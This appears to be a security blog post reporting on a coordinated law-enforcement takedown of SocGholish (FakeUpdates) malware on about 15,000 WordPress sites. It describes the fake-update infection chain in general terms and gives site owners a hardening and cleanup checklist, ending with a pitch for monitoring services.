Operation Endgame Cleaned 15,000 WordPress Sites — Yours Could Be Next
Last week, the FBI, Dutch police, Germany's BKA, and the RCMP — coordinating through Europol and Eurojust — pulled off one of the largest coordinated malware takedowns in history. Operation Endgame dismantled 106 command-and-control servers, seized dozens of domains, and quietly removed backdoors from 14,971 infected WordPress websites. The operation targeted SocGholish (also called FakeUpdates), a JavaScript malware framework that has been quietly weaponizing legitimate small-business websites since 2017.
If your business runs a WordPress site, this story is about your customers as much as it is about the criminals who got taken down.
What SocGholish Actually Does to a Site
The mechanics are grimly clever. Attackers compromise a legitimate WordPress site — a restaurant, a car garage, a dentist office — and inject a thin layer of JavaScript that watches incoming visitors. When someone lands on the page, the JS profiles the browser, checks for sandbox indicators, and then replaces the entire visible page content with a convincing fake: a browser update prompt, a system alert, or a software notification that looks pixel-perfect for the visitor's operating system and browser version.
When the visitor clicks to "update," they download an installer. That installer runs on their machine and installs a backdoor — GhostWeaver, AsyncRAT, NetSupport RAT — which then grants the attackers persistent remote access. From there, the infection chain has historically delivered LockBit and RansomHub ransomware, as well as Dridex (the banking trojan that made Evil Corp infamous). The key detail: the attack happens on the visitor's machine, not on the compromised WordPress site. The site owner is unknowingly turned into an attacker's distribution point.
The Scale Is Hard to Overstate
Shadowserver's data, gathered in support of the operation, identified 1,441,695 instances of compromised legitimate WordPress sites across 187 countries, spanning 271,176 unique IP addresses across 7,550 autonomous systems. That is not a niche campaign. Roughly 55 percent of cloud hosting customers had measurable SocGholish exposure in 2026. The 15,000 sites actually cleaned represent the worst of the worst — the ones actively serving malware payloads — not the full universe of sites with compromised credentials or stale vulnerabilities that made them candidates for infection.
How Sites Got Compromised
SocGholish is not a zero-day campaign. Shadowserver's breakdown of infection methods is depressingly familiar:
- Credential stuffing and brute force — attackers ran leaked username/password lists against wp-admin until they got in. In May 2026 alone, over 1.44 million sets of WordPress site credentials were circulating in criminal markets.
- Plugin and theme vulnerabilities — unpatched vulnerabilities in installed plugins gave attackers unauthenticated footholds without needing any credentials at all.
- Reused passwords from other breaches — site owners who used the same password on their WordPress admin and a breached service handed over access without any active attack.
- Domain shadowing — in some cases, attackers gained access to DNS providers and created malicious subdomains that blended into the victim's legitimate DNS infrastructure, making detection harder.
None of this required a sophisticated state-level attacker. The group behind SocGholish — tracked as DEV-0206, Gold Prelude, and TA569 — operates as an initial access broker: they break in, plant the infrastructure, and rent out the compromised sites to ransomware affiliates including LockBit and RansomHub. The Evil Corp connection means U.S. law enforcement treats payments to these groups as potentially sanctionable, which adds legal complexity for any victim company that considers paying a ransom.
Law Enforcement Cleaned Up, But Didn't Fix Anything
Here is the practical reality: Dutch authorities removed the backdoors and notified affected site owners to take further action. What they did not do is patch the vulnerabilities, change your passwords, or audit your plugin inventory. The cleanup was surgical — infrastructure taken down, malware removed from the specific 15,000 sites — but the underlying conditions that got those sites infected still exist everywhere else.
Dutch police's own guidance to affected site owners was four steps: change login credentials, enable multi-factor authentication, remove any unrecognized WordPress accounts, and update WordPress to the latest version. That is the minimum. A complete response should also include:
- Audit every installed plugin and theme — delete anything unused, update everything remaining.
- Review your file system for unexpected
.phpfiles in upload directories, which is a classic persistence mechanism. - Check DNS records for subdomains you didn't create (domain shadowing leaves traces).
- Run a malware scan using a server-side scanner, not just a plugin-level check — SocGholish injections can live in
functions.php,.htaccess, or auto-loaded option values in the database. - Rotate credentials for all admin accounts, hosting control panel, FTP, and database.
- Verify your backup chain is intact and clean — a backup made during the infection window is a backup of the infected site.
What This Means for Your Visitors
This is the part that keeps site owners up at night when they find out: their customers — people who trusted their website — may have been served ransomware through an entirely normal-looking visit. No data was stolen from the WordPress site itself. The damage landed on visitors' machines. That is an exposure that does not show up in your own server logs as anything alarming. If visitors reported unusual pop-ups, got infected, and traced it back to your site, the reputational and legal fallout is yours to manage — even though your site was the victim too.
Running 24x7x365 NOC monitoring and integrity checks is exactly the kind of thing that catches these injections before they start hurting customers. The restore drills matter too — knowing your clean baseline makes it much faster to confirm what was changed and what was not.
The takedown was a win. The window it created for defenders is narrow. Use it.
